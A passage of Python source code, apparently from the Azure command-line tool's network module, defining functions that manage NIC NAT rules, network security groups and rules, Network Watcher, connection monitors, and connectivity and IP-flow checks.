cmd, resource_group_name, network_interface_name, ip_config_name, inbound_nat_rule,
load_balancer_name=None):
InboundNatRule = cmd.get_models('InboundNatRule')
client = network_client_factory(cmd.cli_ctx).network_interfaces
nic = client.get(resource_group_name, network_interface_name)
ip_config = _get_nic_ip_config(nic, ip_config_name)
upsert_to_collection(ip_config, 'load_balancer_inbound_nat_rules',
InboundNatRule(id=inbound_nat_rule),
'id')
poller = client.begin_create_or_update(resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
def remove_nic_ip_config_inbound_nat_rule(
cmd, resource_group_name, network_interface_name, ip_config_name, inbound_nat_rule,
load_balancer_name=None):
client = network_client_factory(cmd.cli_ctx).network_interfaces
nic = client.get(resource_group_name, network_interface_name)
ip_config = _get_nic_ip_config(nic, ip_config_name)
keep_items = \
[x for x in ip_config.load_balancer_inbound_nat_rules or [] if x.id != inbound_nat_rule]
ip_config.load_balancer_inbound_nat_rules = keep_items
poller = client.begin_create_or_update(resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
# endregion
# region NetworkSecurityGroups
def create_nsg(cmd, resource_group_name, network_security_group_name, location=None, tags=None):
client = network_client_factory(cmd.cli_ctx).network_security_groups
NetworkSecurityGroup = cmd.get_models('NetworkSecurityGroup')
nsg = NetworkSecurityGroup(location=location, tags=tags)
return client.begin_create_or_update(resource_group_name, network_security_group_name, nsg)
def _create_singular_or_plural_property(kwargs, val, singular_name, plural_name):
if not val:
return
if not isinstance(val, list):
val = [val]
if len(val) > 1:
kwargs[plural_name] = val
kwargs[singular_name] = None
else:
kwargs[singular_name] = val[0]
kwargs[plural_name] = None
def _handle_asg_property(kwargs, key, asgs):
prefix = key.split('_', 1)[0] + '_'
if asgs:
kwargs[key] = asgs
if kwargs[prefix + 'address_prefix'].is_default:
kwargs[prefix + 'address_prefix'] = ''
def create_nsg_rule_2017_06_01(cmd, resource_group_name, network_security_group_name, security_rule_name,
priority, description=None, protocol=None, access=None, direction=None,
source_port_ranges='*', source_address_prefixes='*',
destination_port_ranges=80, destination_address_prefixes='*',
source_asgs=None, destination_asgs=None):
kwargs = {
'protocol': protocol,
'direction': direction,
'description': description,
'priority': priority,
'access': access,
'name': security_rule_name
}
_create_singular_or_plural_property(kwargs, source_address_prefixes,
'source_address_prefix', 'source_address_prefixes')
_create_singular_or_plural_property(kwargs, destination_address_prefixes,
'destination_address_prefix', 'destination_address_prefixes')
_create_singular_or_plural_property(kwargs, source_port_ranges,
'source_port_range', 'source_port_ranges')
_create_singular_or_plural_property(kwargs, destination_port_ranges,
'destination_port_range', 'destination_port_ranges')
# workaround for issue https://github.com/Azure/azure-rest-api-specs/issues/1591
kwargs['source_address_prefix'] = kwargs['source_address_prefix'] or ''
kwargs['destination_address_prefix'] = kwargs['destination_address_prefix'] or ''
if cmd.supported_api_version(min_api='2017-09-01'):
_handle_asg_property(kwargs, 'source_application_security_groups', source_asgs)
_handle_asg_property(kwargs, 'destination_application_security_groups', destination_asgs)
SecurityRule = cmd.get_models('SecurityRule')
settings = SecurityRule(**kwargs)
ncf = network_client_factory(cmd.cli_ctx)
return ncf.security_rules.begin_create_or_update(
resource_group_name, network_security_group_name, security_rule_name, settings)
def create_nsg_rule_2017_03_01(cmd, resource_group_name, network_security_group_name, security_rule_name,
priority, description=None, protocol=None, access=None, direction=None,
source_port_range='*', source_address_prefix='*',
destination_port_range=80, destination_address_prefix='*'):
SecurityRule = cmd.get_models('SecurityRule')
settings = SecurityRule(protocol=protocol, source_address_prefix=source_address_prefix,
destination_address_prefix=destination_address_prefix, access=access,
direction=direction,
description=description, source_port_range=source_port_range,
destination_port_range=destination_port_range, priority=priority,
name=security_rule_name)
ncf = network_client_factory(cmd.cli_ctx)
return ncf.security_rules.begin_create_or_update(
resource_group_name, network_security_group_name, security_rule_name, settings)
def _update_singular_or_plural_property(instance, val, singular_name, plural_name):
if val is None:
return
if not isinstance(val, list):
val = [val]
if len(val) > 1:
setattr(instance, plural_name, val)
setattr(instance, singular_name, None)
else:
setattr(instance, plural_name, None)
setattr(instance, singular_name, val[0])
def update_nsg_rule_2017_06_01(instance, protocol=None, source_address_prefixes=None,
destination_address_prefixes=None, access=None, direction=None, description=None,
source_port_ranges=None, destination_port_ranges=None, priority=None,
source_asgs=None, destination_asgs=None):
# No client validation as server side returns pretty good errors
instance.protocol = protocol if protocol is not None else instance.protocol
instance.access = access if access is not None else instance.access
instance.direction = direction if direction is not None else instance.direction
instance.description = description if description is not None else instance.description
instance.priority = priority if priority is not None else instance.priority
_update_singular_or_plural_property(instance, source_address_prefixes,
'source_address_prefix', 'source_address_prefixes')
_update_singular_or_plural_property(instance, destination_address_prefixes,
'destination_address_prefix', 'destination_address_prefixes')
_update_singular_or_plural_property(instance, source_port_ranges,
'source_port_range', 'source_port_ranges')
_update_singular_or_plural_property(instance, destination_port_ranges,
'destination_port_range', 'destination_port_ranges')
# workaround for issue https://github.com/Azure/azure-rest-api-specs/issues/1591
instance.source_address_prefix = instance.source_address_prefix or ''
instance.destination_address_prefix = instance.destination_address_prefix or ''
if source_asgs == ['']:
instance.source_application_security_groups = None
elif source_asgs:
instance.source_application_security_groups = source_asgs
if destination_asgs == ['']:
instance.destination_application_security_groups = None
elif destination_asgs:
instance.destination_application_security_groups = destination_asgs
return instance
def update_nsg_rule_2017_03_01(instance, protocol=None, source_address_prefix=None,
destination_address_prefix=None, access=None, direction=None, description=None,
source_port_range=None, destination_port_range=None, priority=None):
# No client validation as server side returns pretty good errors
instance.protocol = protocol if protocol is not None else instance.protocol
instance.source_address_prefix = (source_address_prefix if source_address_prefix is not None
else instance.source_address_prefix)
instance.destination_address_prefix = destination_address_prefix \
if destination_address_prefix is not None else instance.destination_address_prefix
instance.access = access if access is not None else instance.access
instance.direction = direction if direction is not None else instance.direction
instance.description = description if description is not None else instance.description
instance.source_port_range = source_port_range \
if source_port_range is not None else instance.source_port_range
instance.destination_port_range = destination_port_range \
if destination_port_range is not None else instance.destination_port_range
instance.priority = priority if priority is not None else instance.priority
return instance
# endregion
# region NetworkProfiles
def list_network_profiles(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).network_profiles
if resource_group_name:
return client.list(resource_group_name)
return client.list_all()
# endregion
# region NetworkWatchers
def _create_network_watchers(cmd, client, resource_group_name, locations, tags):
if resource_group_name is None:
raise CLIError("usage error: '--resource-group' required when enabling new regions")
NetworkWatcher = cmd.get_models('NetworkWatcher')
for location in locations:
client.create_or_update(
resource_group_name, '{}-watcher'.format(location),
NetworkWatcher(location=location, tags=tags))
def _update_network_watchers(cmd, client, watchers, tags):
NetworkWatcher = cmd.get_models('NetworkWatcher')
for watcher in watchers:
id_parts = parse_resource_id(watcher.id)
watcher_rg = id_parts['resource_group']
watcher_name = id_parts['name']
watcher_tags = watcher.tags if tags is None else tags
client.create_or_update(
watcher_rg, watcher_name,
NetworkWatcher(location=watcher.location, tags=watcher_tags))
def _delete_network_watchers(cmd, client, watchers):
for watcher in watchers:
from azure.cli.core.commands import LongRunningOperation
id_parts = parse_resource_id(watcher.id)
watcher_rg = id_parts['resource_group']
watcher_name = id_parts['name']
logger.warning(
"Disabling Network Watcher for region '%s' by deleting resource '%s'",
watcher.location, watcher.id)
LongRunningOperation(cmd.cli_ctx)(client.begin_delete(watcher_rg, watcher_name))
def configure_network_watcher(cmd, client, locations, resource_group_name=None, enabled=None, tags=None):
watcher_list = list(client.list_all())
locations_list = [location.lower() for location in locations]
existing_watchers = [w for w in watcher_list if w.location in locations_list]
nonenabled_regions = list(set(locations) - set(watcher.location for watcher in existing_watchers))
if enabled is None:
if resource_group_name is not None:
logger.warning(
"Resource group '%s' is only used when enabling new regions and will be ignored.",
resource_group_name)
for location in nonenabled_regions:
logger.warning(
"Region '%s' is not enabled for Network Watcher and will be ignored.", location)
_update_network_watchers(cmd, client, existing_watchers, tags)
elif enabled:
_create_network_watchers(cmd, client, resource_group_name, nonenabled_regions, tags)
_update_network_watchers(cmd, client, existing_watchers, tags)
else:
if tags is not None:
raise CLIError("usage error: '--tags' cannot be used when disabling regions")
_delete_network_watchers(cmd, client, existing_watchers)
return client.list_all()
def create_nw_connection_monitor(cmd,
client,
connection_monitor_name,
watcher_rg,
watcher_name,
resource_group_name=None,
location=None,
source_resource=None,
source_port=None,
dest_resource=None,
dest_port=None,
dest_address=None,
tags=None,
do_not_start=None,
monitoring_interval=None,
endpoint_source_name=None,
endpoint_source_resource_id=None,
endpoint_source_address=None,
endpoint_source_type=None,
endpoint_source_coverage_level=None,
endpoint_dest_name=None,
endpoint_dest_resource_id=None,
endpoint_dest_address=None,
endpoint_dest_type=None,
endpoint_dest_coverage_level=None,
test_config_name=None,
test_config_frequency=None,
test_config_protocol=None,
test_config_preferred_ip_version=None,
test_config_threshold_failed_percent=None,
test_config_threshold_round_trip_time=None,
test_config_tcp_disable_trace_route=None,
test_config_tcp_port=None,
test_config_tcp_port_behavior=None,
test_config_icmp_disable_trace_route=None,
test_config_http_port=None,
test_config_http_method=None,
test_config_http_path=None,
test_config_http_valid_status_codes=None,
test_config_http_prefer_https=None,
test_group_name=None,
test_group_disable=None,
output_type=None,
workspace_ids=None,
notes=None):
v1_required_parameter_set = [
source_resource, source_port,
dest_resource, dest_address, dest_port
]
v2_required_parameter_set = [
endpoint_source_name, endpoint_source_resource_id, endpoint_source_type, endpoint_source_coverage_level,
endpoint_dest_name, endpoint_dest_address, endpoint_dest_type, endpoint_dest_coverage_level,
test_config_name, test_config_protocol,
output_type, workspace_ids,
]
if any(v1_required_parameter_set): # V1 creation
connection_monitor = _create_nw_connection_monitor_v1(cmd,
connection_monitor_name,
watcher_rg,
watcher_name,
source_resource,
resource_group_name,
source_port,
location,
dest_resource,
dest_port,
dest_address,
tags,
do_not_start,
monitoring_interval)
from azure.cli.core.profiles._shared import AD_HOC_API_VERSIONS
client = get_mgmt_service_client(
cmd.cli_ctx,
ResourceType.MGMT_NETWORK,
api_version=AD_HOC_API_VERSIONS[ResourceType.MGMT_NETWORK]['nw_connection_monitor']
).connection_monitors
elif any(v2_required_parameter_set): # V2 creation
connection_monitor = _create_nw_connection_monitor_v2(cmd,
location,
tags,
endpoint_source_name,
endpoint_source_resource_id,
endpoint_source_address,
endpoint_source_type,
endpoint_source_coverage_level,
endpoint_dest_name,
endpoint_dest_resource_id,
endpoint_dest_address,
endpoint_dest_type,
endpoint_dest_coverage_level,
test_config_name,
test_config_frequency,
test_config_protocol,
test_config_preferred_ip_version,
test_config_threshold_failed_percent,
test_config_threshold_round_trip_time,
test_config_tcp_port,
test_config_tcp_port_behavior,
test_config_tcp_disable_trace_route,
test_config_icmp_disable_trace_route,
test_config_http_port,
test_config_http_method,
test_config_http_path,
test_config_http_valid_status_codes,
test_config_http_prefer_https,
test_group_name,
test_group_disable,
output_type,
workspace_ids,
notes)
else:
raise CLIError('Unknown operation')
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def _create_nw_connection_monitor_v1(cmd,
connection_monitor_name,
watcher_rg,
watcher_name,
source_resource,
resource_group_name=None,
source_port=None,
location=None,
dest_resource=None,
dest_port=None,
dest_address=None,
tags=None,
do_not_start=None,
monitoring_interval=60):
ConnectionMonitor, ConnectionMonitorSource, ConnectionMonitorDestination = cmd.get_models(
'ConnectionMonitor', 'ConnectionMonitorSource', 'ConnectionMonitorDestination')
cmv1 = ConnectionMonitor(
location=location,
tags=tags,
source=ConnectionMonitorSource(
resource_id=source_resource,
port=source_port
),
destination=ConnectionMonitorDestination(
resource_id=dest_resource,
port=dest_port,
address=dest_address
),
auto_start=not do_not_start,
monitoring_interval_in_seconds=monitoring_interval,
endpoints=None,
test_configurations=None,
test_groups=None,
outputs=None,
notes=None
)
return cmv1
def _create_nw_connection_monitor_v2(cmd,
location=None,
tags=None,
endpoint_source_name=None,
endpoint_source_resource_id=None,
endpoint_source_address=None,
endpoint_source_type=None,
endpoint_source_coverage_level=None,
endpoint_dest_name=None,
endpoint_dest_resource_id=None,
endpoint_dest_address=None,
endpoint_dest_type=None,
endpoint_dest_coverage_level=None,
test_config_name=None,
test_config_frequency=None,
test_config_protocol=None,
test_config_preferred_ip_version=None,
test_config_threshold_failed_percent=None,
test_config_threshold_round_trip_time=None,
test_config_tcp_port=None,
test_config_tcp_port_behavior=None,
test_config_tcp_disable_trace_route=False,
test_config_icmp_disable_trace_route=False,
test_config_http_port=None,
test_config_http_method=None,
test_config_http_path=None,
test_config_http_valid_status_codes=None,
test_config_http_prefer_https=None,
test_group_name=None,
test_group_disable=False,
output_type=None,
workspace_ids=None,
notes=None):
src_endpoint = _create_nw_connection_monitor_v2_endpoint(cmd,
endpoint_source_name,
endpoint_resource_id=endpoint_source_resource_id,
address=endpoint_source_address,
endpoint_type=endpoint_source_type,
coverage_level=endpoint_source_coverage_level)
dst_endpoint = _create_nw_connection_monitor_v2_endpoint(cmd,
endpoint_dest_name,
endpoint_resource_id=endpoint_dest_resource_id,
address=endpoint_dest_address,
endpoint_type=endpoint_dest_type,
coverage_level=endpoint_dest_coverage_level)
test_config = _create_nw_connection_monitor_v2_test_configuration(cmd,
test_config_name,
test_config_frequency,
test_config_protocol,
test_config_threshold_failed_percent,
test_config_threshold_round_trip_time,
test_config_preferred_ip_version,
test_config_tcp_port,
test_config_tcp_port_behavior,
test_config_tcp_disable_trace_route,
test_config_icmp_disable_trace_route,
test_config_http_port,
test_config_http_method,
test_config_http_path,
test_config_http_valid_status_codes,
test_config_http_prefer_https)
test_group = _create_nw_connection_monitor_v2_test_group(cmd,
test_group_name,
test_group_disable,
[test_config],
[src_endpoint],
[dst_endpoint])
if output_type:
outputs = []
if workspace_ids:
for workspace_id in workspace_ids:
output = _create_nw_connection_monitor_v2_output(cmd, output_type, workspace_id)
outputs.append(output)
else:
outputs = []
ConnectionMonitor = cmd.get_models('ConnectionMonitor')
cmv2 = ConnectionMonitor(location=location,
tags=tags,
auto_start=None,
monitoring_interval_in_seconds=None,
endpoints=[src_endpoint, dst_endpoint],
test_configurations=[test_config],
test_groups=[test_group],
outputs=outputs,
notes=notes)
return cmv2
def _create_nw_connection_monitor_v2_endpoint(cmd,
name,
endpoint_resource_id=None,
address=None,
filter_type=None,
filter_items=None,
endpoint_type=None,
coverage_level=None):
if (filter_type and not filter_items) or (not filter_type and filter_items):
raise CLIError('usage error: '
'--filter-type and --filter-item for endpoint filter must be present at the same time.')
ConnectionMonitorEndpoint, ConnectionMonitorEndpointFilter = cmd.get_models(
'ConnectionMonitorEndpoint', 'ConnectionMonitorEndpointFilter')
endpoint = ConnectionMonitorEndpoint(name=name,
resource_id=endpoint_resource_id,
address=address,
type=endpoint_type,
coverage_level=coverage_level)
if filter_type and filter_items:
endpoint_filter = ConnectionMonitorEndpointFilter(type=filter_type, items=filter_items)
endpoint.filter = endpoint_filter
return endpoint
def _create_nw_connection_monitor_v2_test_configuration(cmd,
name,
test_frequency,
protocol,
threshold_failed_percent,
threshold_round_trip_time,
preferred_ip_version,
tcp_port=None,
tcp_port_behavior=None,
tcp_disable_trace_route=None,
icmp_disable_trace_route=None,
http_port=None,
http_method=None,
http_path=None,
http_valid_status_codes=None,
http_prefer_https=None,
http_request_headers=None):
(ConnectionMonitorTestConfigurationProtocol,
ConnectionMonitorTestConfiguration, ConnectionMonitorSuccessThreshold) = cmd.get_models(
'ConnectionMonitorTestConfigurationProtocol',
'ConnectionMonitorTestConfiguration', 'ConnectionMonitorSuccessThreshold')
test_config = ConnectionMonitorTestConfiguration(name=name,
test_frequency_sec=test_frequency,
protocol=protocol,
preferred_ip_version=preferred_ip_version)
if threshold_failed_percent or threshold_round_trip_time:
threshold = ConnectionMonitorSuccessThreshold(checks_failed_percent=threshold_failed_percent,
round_trip_time_ms=threshold_round_trip_time)
test_config.success_threshold = threshold
if protocol == ConnectionMonitorTestConfigurationProtocol.tcp:
ConnectionMonitorTcpConfiguration = cmd.get_models('ConnectionMonitorTcpConfiguration')
tcp_config = ConnectionMonitorTcpConfiguration(
port=tcp_port,
destination_port_behavior=tcp_port_behavior,
disable_trace_route=tcp_disable_trace_route
)
test_config.tcp_configuration = tcp_config
elif protocol == ConnectionMonitorTestConfigurationProtocol.icmp:
ConnectionMonitorIcmpConfiguration = cmd.get_models('ConnectionMonitorIcmpConfiguration')
icmp_config = ConnectionMonitorIcmpConfiguration(disable_trace_route=icmp_disable_trace_route)
test_config.icmp_configuration = icmp_config
elif protocol == ConnectionMonitorTestConfigurationProtocol.http:
ConnectionMonitorHttpConfiguration = cmd.get_models('ConnectionMonitorHttpConfiguration')
http_config = ConnectionMonitorHttpConfiguration(
port=http_port,
method=http_method,
path=http_path,
request_headers=http_request_headers,
valid_status_code_ranges=http_valid_status_codes,
prefer_https=http_prefer_https)
test_config.http_configuration = http_config
else:
raise CLIError('Unsupported protocol: "{}" for test configuration'.format(protocol))
return test_config
def _create_nw_connection_monitor_v2_test_group(cmd,
name,
disable,
test_configurations,
source_endpoints,
destination_endpoints):
ConnectionMonitorTestGroup = cmd.get_models('ConnectionMonitorTestGroup')
test_group = ConnectionMonitorTestGroup(name=name,
disable=disable,
test_configurations=[tc.name for tc in test_configurations],
sources=[e.name for e in source_endpoints],
destinations=[e.name for e in destination_endpoints])
return test_group
def _create_nw_connection_monitor_v2_output(cmd,
output_type,
workspace_id=None):
ConnectionMonitorOutput, OutputType = cmd.get_models('ConnectionMonitorOutput', 'OutputType')
output = ConnectionMonitorOutput(type=output_type)
if output_type == OutputType.workspace:
ConnectionMonitorWorkspaceSettings = cmd.get_models('ConnectionMonitorWorkspaceSettings')
workspace = ConnectionMonitorWorkspaceSettings(workspace_resource_id=workspace_id)
output.workspace_settings = workspace
else:
raise CLIError('Unsupported output type: "{}"'.format(output_type))
return output
def add_nw_connection_monitor_v2_endpoint(cmd,
client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name,
coverage_level=None,
endpoint_type=None,
source_test_groups=None,
dest_test_groups=None,
endpoint_resource_id=None,
address=None,
filter_type=None,
filter_items=None,
address_include=None,
address_exclude=None):
(ConnectionMonitorEndpoint, ConnectionMonitorEndpointFilter,
ConnectionMonitorEndpointScope, ConnectionMonitorEndpointScopeItem) = cmd.get_models(
'ConnectionMonitorEndpoint', 'ConnectionMonitorEndpointFilter',
'ConnectionMonitorEndpointScope', 'ConnectionMonitorEndpointScopeItem')
endpoint_scope = ConnectionMonitorEndpointScope(include=[], exclude=[])
for ip in address_include or []:
include_item = ConnectionMonitorEndpointScopeItem(address=ip)
endpoint_scope.include.append(include_item)
for ip in address_exclude or []:
exclude_item = ConnectionMonitorEndpointScopeItem(address=ip)
endpoint_scope.exclude.append(exclude_item)
endpoint = ConnectionMonitorEndpoint(name=name,
resource_id=endpoint_resource_id,
address=address,
type=endpoint_type,
coverage_level=coverage_level,
scope=endpoint_scope if address_include or address_exclude else None)
if filter_type and filter_items:
endpoint_filter = ConnectionMonitorEndpointFilter(type=filter_type, items=filter_items)
endpoint.filter = endpoint_filter
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
connection_monitor.endpoints.append(endpoint)
src_test_groups, dst_test_groups = set(source_test_groups or []), set(dest_test_groups or [])
for test_group in connection_monitor.test_groups:
if test_group.name in src_test_groups:
test_group.sources.append(endpoint.name)
if test_group.name in dst_test_groups:
test_group.destinations.append(endpoint.name)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def remove_nw_connection_monitor_v2_endpoint(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name,
test_groups=None):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
# refresh endpoints
new_endpoints = [endpoint for endpoint in connection_monitor.endpoints if endpoint.name != name]
connection_monitor.endpoints = new_endpoints
# refresh test groups
if test_groups is not None:
temp_test_groups = [t for t in connection_monitor.test_groups if t.name in test_groups]
else:
temp_test_groups = connection_monitor.test_groups
for test_group in temp_test_groups:
if name in test_group.sources:
test_group.sources.remove(name)
if name in test_group.destinations:
test_group.destinations.remove(name)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def show_nw_connection_monitor_v2_endpoint(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
for endpoint in connection_monitor.endpoints:
if endpoint.name == name:
return endpoint
raise CLIError('unknown endpoint: {}'.format(name))
def list_nw_connection_monitor_v2_endpoint(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
return connection_monitor.endpoints
def add_nw_connection_monitor_v2_test_configuration(cmd,
client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name,
protocol,
test_groups,
frequency=None,
threshold_failed_percent=None,
threshold_round_trip_time=None,
preferred_ip_version=None,
tcp_port=None,
tcp_port_behavior=None,
tcp_disable_trace_route=None,
icmp_disable_trace_route=None,
http_port=None,
http_method=None,
http_path=None,
http_valid_status_codes=None,
http_prefer_https=None,
http_request_headers=None):
new_test_config = _create_nw_connection_monitor_v2_test_configuration(cmd,
name,
frequency,
protocol,
threshold_failed_percent,
threshold_round_trip_time,
preferred_ip_version,
tcp_port,
tcp_port_behavior,
tcp_disable_trace_route,
icmp_disable_trace_route,
http_port,
http_method,
http_path,
http_valid_status_codes,
http_prefer_https,
http_request_headers)
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
connection_monitor.test_configurations.append(new_test_config)
for test_group in connection_monitor.test_groups:
if test_group.name in test_groups:
test_group.test_configurations.append(new_test_config.name)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def remove_nw_connection_monitor_v2_test_configuration(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name,
test_groups=None):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
# refresh test configurations
new_test_configurations = [t for t in connection_monitor.test_configurations if t.name != name]
connection_monitor.test_configurations = new_test_configurations
if test_groups is not None:
temp_test_groups = [t for t in connection_monitor.test_groups if t.name in test_groups]
else:
temp_test_groups = connection_monitor.test_groups
# refresh test groups
for test_group in temp_test_groups:
test_group.test_configurations.remove(name)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def show_nw_connection_monitor_v2_test_configuration(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
for test_config in connection_monitor.test_configurations:
if test_config.name == name:
return test_config
raise CLIError('unknown test configuration: {}'.format(name))
def list_nw_connection_monitor_v2_test_configuration(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
return connection_monitor.test_configurations
def add_nw_connection_monitor_v2_test_group(cmd,
client,
connection_monitor_name,
watcher_rg,
watcher_name,
location,
name,
endpoint_source_name,
endpoint_dest_name,
test_config_name,
disable=False,
endpoint_source_resource_id=None,
endpoint_source_address=None,
endpoint_dest_resource_id=None,
endpoint_dest_address=None,
test_config_frequency=None,
test_config_protocol=None,
test_config_preferred_ip_version=None,
test_config_threshold_failed_percent=None,
test_config_threshold_round_trip_time=None,
test_config_tcp_disable_trace_route=None,
test_config_tcp_port=None,
test_config_icmp_disable_trace_route=None,
test_config_http_port=None,
test_config_http_method=None,
test_config_http_path=None,
test_config_http_valid_status_codes=None,
test_config_http_prefer_https=None):
new_test_configuration_creation_requirements = [
test_config_protocol, test_config_preferred_ip_version,
test_config_threshold_failed_percent, test_config_threshold_round_trip_time,
test_config_tcp_disable_trace_route, test_config_tcp_port,
test_config_icmp_disable_trace_route,
test_config_http_port, test_config_http_method,
test_config_http_path, test_config_http_valid_status_codes, test_config_http_prefer_https
]
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
new_test_group = _create_nw_connection_monitor_v2_test_group(cmd,
name,
disable,
[], [], [])
# deal with endpoint
if any([endpoint_source_address, endpoint_source_resource_id]):
src_endpoint = _create_nw_connection_monitor_v2_endpoint(cmd,
endpoint_source_name,
endpoint_source_resource_id,
endpoint_source_address)
connection_monitor.endpoints.append(src_endpoint)
if any([endpoint_dest_address, endpoint_dest_resource_id]):
dst_endpoint = _create_nw_connection_monitor_v2_endpoint(cmd,
endpoint_dest_name,
endpoint_dest_resource_id,
endpoint_dest_address)
connection_monitor.endpoints.append(dst_endpoint)
new_test_group.sources.append(endpoint_source_name)
new_test_group.destinations.append(endpoint_dest_name)
# deal with test configuration
if any(new_test_configuration_creation_requirements):
test_config = _create_nw_connection_monitor_v2_test_configuration(cmd,
test_config_name,
test_config_frequency,
test_config_protocol,
test_config_threshold_failed_percent,
test_config_threshold_round_trip_time,
test_config_preferred_ip_version,
test_config_tcp_port,
test_config_tcp_disable_trace_route,
test_config_icmp_disable_trace_route,
test_config_http_port,
test_config_http_method,
test_config_http_path,
test_config_http_valid_status_codes,
test_config_http_prefer_https)
connection_monitor.test_configurations.append(test_config)
new_test_group.test_configurations.append(test_config_name)
connection_monitor.test_groups.append(new_test_group)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def remove_nw_connection_monitor_v2_test_group(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
new_test_groups, removed_test_group = [], None
for t in connection_monitor.test_groups:
if t.name == name:
removed_test_group = t
else:
new_test_groups.append(t)
if removed_test_group is None:
raise CLIError('test group: "{}" not exist'.format(name))
connection_monitor.test_groups = new_test_groups
# deal with endpoints which are only referenced by this removed test group
removed_endpoints = []
for e in removed_test_group.sources + removed_test_group.destinations:
tmp = [t for t in connection_monitor.test_groups if (e in t.sources or e in t.destinations)]
if not tmp:
removed_endpoints.append(e)
connection_monitor.endpoints = [e for e in connection_monitor.endpoints if e.name not in removed_endpoints]
# deal with test configurations which are only referenced by this remove test group
removed_test_configurations = []
for c in removed_test_group.test_configurations:
tmp = [t for t in connection_monitor.test_groups if c in t.test_configurations]
if not tmp:
removed_test_configurations.append(c)
connection_monitor.test_configurations = [c for c in connection_monitor.test_configurations
if c.name not in removed_test_configurations]
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def show_nw_connection_monitor_v2_test_group(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
for t in connection_monitor.test_groups:
if t.name == name:
return t
raise CLIError('unknown test group: {}'.format(name))
def list_nw_connection_monitor_v2_test_group(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
return connection_monitor.test_groups
def add_nw_connection_monitor_v2_output(cmd,
client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
out_type,
workspace_id=None):
output = _create_nw_connection_monitor_v2_output(cmd, out_type, workspace_id)
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
if connection_monitor.outputs is None:
connection_monitor.outputs = []
connection_monitor.outputs.append(output)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def remove_nw_connection_monitor_v2_output(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
connection_monitor.outputs = []
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def list_nw_connection_monitor_v2_output(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
return connection_monitor.outputs
def show_topology_watcher(cmd, client, resource_group_name, network_watcher_name, target_resource_group_name=None,
target_vnet=None, target_subnet=None): # pylint: disable=unused-argument
TopologyParameters = cmd.get_models('TopologyParameters')
return client.get_topology(
resource_group_name=resource_group_name,
network_watcher_name=network_watcher_name,
parameters=TopologyParameters(
target_resource_group_name=target_resource_group_name,
target_virtual_network=target_vnet,
target_subnet=target_subnet
))
def check_nw_connectivity(cmd, client, watcher_rg, watcher_name, source_resource, source_port=None,
dest_resource=None, dest_port=None, dest_address=None,
resource_group_name=None, protocol=None, method=None, headers=None, valid_status_codes=None):
ConnectivitySource, ConnectivityDestination, ConnectivityParameters, ProtocolConfiguration, HTTPConfiguration = \
cmd.get_models(
'ConnectivitySource', 'ConnectivityDestination', 'ConnectivityParameters', 'ProtocolConfiguration',
'HTTPConfiguration')
params = ConnectivityParameters(
source=ConnectivitySource(resource_id=source_resource, port=source_port),
destination=ConnectivityDestination(resource_id=dest_resource, address=dest_address, port=dest_port),
protocol=protocol
)
if any([method, headers, valid_status_codes]):
params.protocol_configuration = ProtocolConfiguration(http_configuration=HTTPConfiguration(
method=method,
headers=headers,
valid_status_codes=valid_status_codes
))
return client.begin_check_connectivity(watcher_rg, watcher_name, params)
def check_nw_ip_flow(cmd, client, vm, watcher_rg, watcher_name, direction, protocol, local, remote,
resource_group_name=None, nic=None, location=None):
VerificationIPFlowParameters = cmd.get_models('VerificationIPFlowParameters')
try:
local_ip_address, local_port = local.split(':')
remote_ip_address, remote_port = remote.split(':')
except:
raise CLIError("usage error: the format of the '--local' and '--remote' should be like x.x.x.x:port")
if not is_valid_resource_id(vm):
if not resource_group_name:
raise CLIError("usage error: --vm NAME --resource-group NAME | --vm ID")
vm = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Compute', type='virtualMachines', name=vm)
if nic and not is_valid_resource_id(nic):
if not resource_group_name:
raise CLIError("usage error: --nic NAME --resource-group NAME | --nic ID")
nic = resource_id(
